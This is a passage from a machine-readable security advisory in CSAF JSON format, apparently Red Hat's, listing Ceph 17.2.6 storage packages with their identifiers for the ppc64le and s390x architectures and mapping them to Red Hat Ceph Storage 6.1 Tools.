"category": "product_version", "name": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-osd-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-radosgw-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-test-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/cephfs-mirror-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephfs2-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephsqlite-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados-devel-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados2-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/libradosstriper1-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/librbd1-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/librgw2-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-cephfs-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rados-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rbd-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rgw-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-fuse-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-mirror-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product": { "name": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_id": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-nbd-debuginfo@17.2.6-167.el9cp?arch=ppc64le\u0026epoch=2" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "ceph-base-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-base-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-base-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-base@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-common-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-common-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-common-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-common@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-fuse-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-fuse-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-fuse-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-fuse@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-immutable-object-cache@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-selinux-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-selinux-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-selinux-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-selinux@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephfs-devel-2:17.2.6-167.el9cp.s390x", "product": { "name": "libcephfs-devel-2:17.2.6-167.el9cp.s390x", "product_id": "libcephfs-devel-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephfs-devel@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephfs2-2:17.2.6-167.el9cp.s390x", "product": { "name": "libcephfs2-2:17.2.6-167.el9cp.s390x", "product_id": "libcephfs2-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephfs2@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "librados-devel-2:17.2.6-167.el9cp.s390x", "product": { "name": "librados-devel-2:17.2.6-167.el9cp.s390x", "product_id": "librados-devel-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados-devel@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "librados2-2:17.2.6-167.el9cp.s390x", "product": { "name": "librados2-2:17.2.6-167.el9cp.s390x", "product_id": "librados2-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados2@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "libradospp-devel-2:17.2.6-167.el9cp.s390x", "product": { "name": "libradospp-devel-2:17.2.6-167.el9cp.s390x", "product_id": "libradospp-devel-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/libradospp-devel@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "libradosstriper1-2:17.2.6-167.el9cp.s390x", "product": { "name": "libradosstriper1-2:17.2.6-167.el9cp.s390x", "product_id": "libradosstriper1-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/libradosstriper1@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "librbd-devel-2:17.2.6-167.el9cp.s390x", "product": { "name": "librbd-devel-2:17.2.6-167.el9cp.s390x", "product_id": "librbd-devel-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/librbd-devel@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "librbd1-2:17.2.6-167.el9cp.s390x", "product": { "name": "librbd1-2:17.2.6-167.el9cp.s390x", "product_id": "librbd1-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/librbd1@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "librgw-devel-2:17.2.6-167.el9cp.s390x", "product": { "name": "librgw-devel-2:17.2.6-167.el9cp.s390x", "product_id": "librgw-devel-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/librgw-devel@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "librgw2-2:17.2.6-167.el9cp.s390x", "product": { "name": "librgw2-2:17.2.6-167.el9cp.s390x", "product_id": "librgw2-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/librgw2@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-ceph-argparse-2:17.2.6-167.el9cp.s390x", "product": { "name": "python3-ceph-argparse-2:17.2.6-167.el9cp.s390x", "product_id": "python3-ceph-argparse-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-ceph-argparse@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-ceph-common-2:17.2.6-167.el9cp.s390x", "product": { "name": "python3-ceph-common-2:17.2.6-167.el9cp.s390x", "product_id": "python3-ceph-common-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-ceph-common@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-cephfs-2:17.2.6-167.el9cp.s390x", "product": { "name": "python3-cephfs-2:17.2.6-167.el9cp.s390x", "product_id": "python3-cephfs-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-cephfs@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rados-2:17.2.6-167.el9cp.s390x", "product": { "name": "python3-rados-2:17.2.6-167.el9cp.s390x", "product_id": "python3-rados-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rados@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rbd-2:17.2.6-167.el9cp.s390x", "product": { "name": "python3-rbd-2:17.2.6-167.el9cp.s390x", "product_id": "python3-rbd-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rbd@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rgw-2:17.2.6-167.el9cp.s390x", "product": { "name": "python3-rgw-2:17.2.6-167.el9cp.s390x", "product_id": "python3-rgw-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rgw@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-nbd-2:17.2.6-167.el9cp.s390x", "product": { "name": "rbd-nbd-2:17.2.6-167.el9cp.s390x", "product_id": "rbd-nbd-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-nbd@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-debugsource-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-debugsource-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-debugsource-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-debugsource@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-base-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-common-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-exporter-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-fuse-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-immutable-object-cache-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-mds-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-mgr-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-mon-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-osd-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-radosgw-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-test-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/cephfs-mirror-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephfs2-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/libcephsqlite-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados-devel-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "librados2-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "librados2-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "librados2-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/librados2-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/libradosstriper1-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "librbd1-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "librbd1-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "librbd1-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/librbd1-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "librgw2-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "librgw2-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "librgw2-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/librgw2-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-cephfs-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rados-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rbd-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/python3-rgw-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-fuse-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-mirror-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } }, { "category": "product_version", "name": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x", "product": { "name": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x", "product_id": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rbd-nbd-debuginfo@17.2.6-167.el9cp?arch=s390x\u0026epoch=2" } } } ], "category": "architecture", "name": "s390x" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "ceph-2:17.2.6-167.el9cp.src as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-2:17.2.6-167.el9cp.src" }, "product_reference": "ceph-2:17.2.6-167.el9cp.src", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-base-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-base-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-base-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-base-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-base-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-base-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-common-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "ceph-common-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-common-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.s390x" }, "product_reference": "ceph-common-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "ceph-common-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "ceph-common-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": 